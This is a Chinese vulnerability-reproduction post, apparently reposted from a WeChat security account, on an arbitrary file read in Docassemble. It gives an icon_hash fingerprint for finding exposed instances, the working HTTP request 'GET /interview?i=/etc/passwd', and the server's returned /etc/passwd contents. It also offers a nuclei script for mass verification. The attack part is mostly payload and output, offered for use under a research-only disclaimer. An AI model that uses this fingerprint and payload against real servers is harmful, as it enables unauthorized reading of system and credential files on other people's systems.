【漏洞复现】Docassemble任意文件读取漏洞

admin
admin
admin
140350
文章
117
评论
2024年7月10日12:00:05评论11 views字数 2009阅读6分41秒阅读模式

声明

该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

公众号现在只对常读和星标的公众号才展示大图推送,建议把公众号设为星标,否则可能就看不到啦!感谢各位师傅。

资产收集

icon_hash="-575790689"

【漏洞复现】Docassemble任意文件读取漏洞

漏洞复现

【漏洞复现】Docassemble任意文件读取漏洞

发送请求

GET /interview?i=/etc/passwd HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

返回包

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/bin/bash backup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologinsystemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin epmd:x:103:104::/run/epmd:/usr/sbin/nologinmessagebus:x:104:106::/nonexistent:/usr/sbin/nologin systemd-timesync:x:105:107:systemdTime Synchronization,,,:/run/systemd:/usr/sbin/nologin Debian-exim:x:106:112::/var/spool/exim4:/usr/sbin/nologinredis:x:107:114::/var/lib/redis:/usr/sbin/nologin postgres:x:108:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bashrabbitmq:x:109:117:RabbitMQ messaging server,,,:/var/lib/rabbitmq:/usr/sbin/nologin

【漏洞复现】Docassemble任意文件读取漏洞

批量验证脚本

关注公众号并回复 “ZH-2024-07-09-001 即可获得该漏洞nuclei脚本

【漏洞复现】Docassemble任意文件读取漏洞

原文始发于微信公众号(Devil安全):【漏洞复现】Docassemble任意文件读取漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月10日12:00:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】Docassemble任意文件读取漏洞https://cn-sec.com/archives/2938821.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息